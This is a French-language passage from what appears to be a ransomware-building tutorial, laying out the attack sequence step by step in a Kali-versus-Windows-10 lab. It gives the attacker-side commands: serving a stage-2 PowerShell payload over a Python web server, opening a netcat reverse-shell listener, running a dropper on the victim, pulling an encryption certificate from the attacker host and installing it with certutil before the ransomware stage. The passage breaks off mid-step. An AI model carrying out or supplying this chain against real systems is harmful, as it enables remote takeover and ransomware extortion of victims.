L’attaque, pas à pas
Le développement est terminé, cela peut paraître compliqué mais en vérité l’attaque en situation réelle tient dans la séquence ci-dessous.
Préparation sur le serveur de l’attaquant :
Sur la machine Kali, lancez un serveur web de contenu sur la machine de l’attaquant :
$ python3 -m http.server
-
Mettez à disposition le stage 2 PowerShell sur le serveur web avec le fichier ematete.ps1 dans une archive ZIP Ematete.zip (en plaçant le fichier directement dans le répertoire proposé par le serveur HTTP).
-
Mettez à disposition sur le serveur web le fichier du certificat contenant la clé publique RSA.
Continuez sur Kali et lancez un listener en attente de reverse shell sur le port 4443 :
$ nc -lvp 4443
Sur le poste Windows 10, exécutez le fichier dropper.ps1 sur la machine de la victime. Cette commande établit une connexion sur le reverse shell et permet de lancer la phase de rançongiciel depuis la machine Kali :
.\dropper.ps1
Depuis le reverse shell sur Kali, faites télécharger sur la machine le certificat pour le chiffrement :
Invoke-WebRequest -Uri http://10.0.2.5:8000/cert.pem -OutFile
cert.pem
Puis injectez-le dans le magasin de l’utilisateur :
certutil -addstore -user -f "My" .\cert.pem
Depuis le reverse shell, exécutez le script Prepare-Key.ps1, soit en copiant-collant ligne par ligne à la main...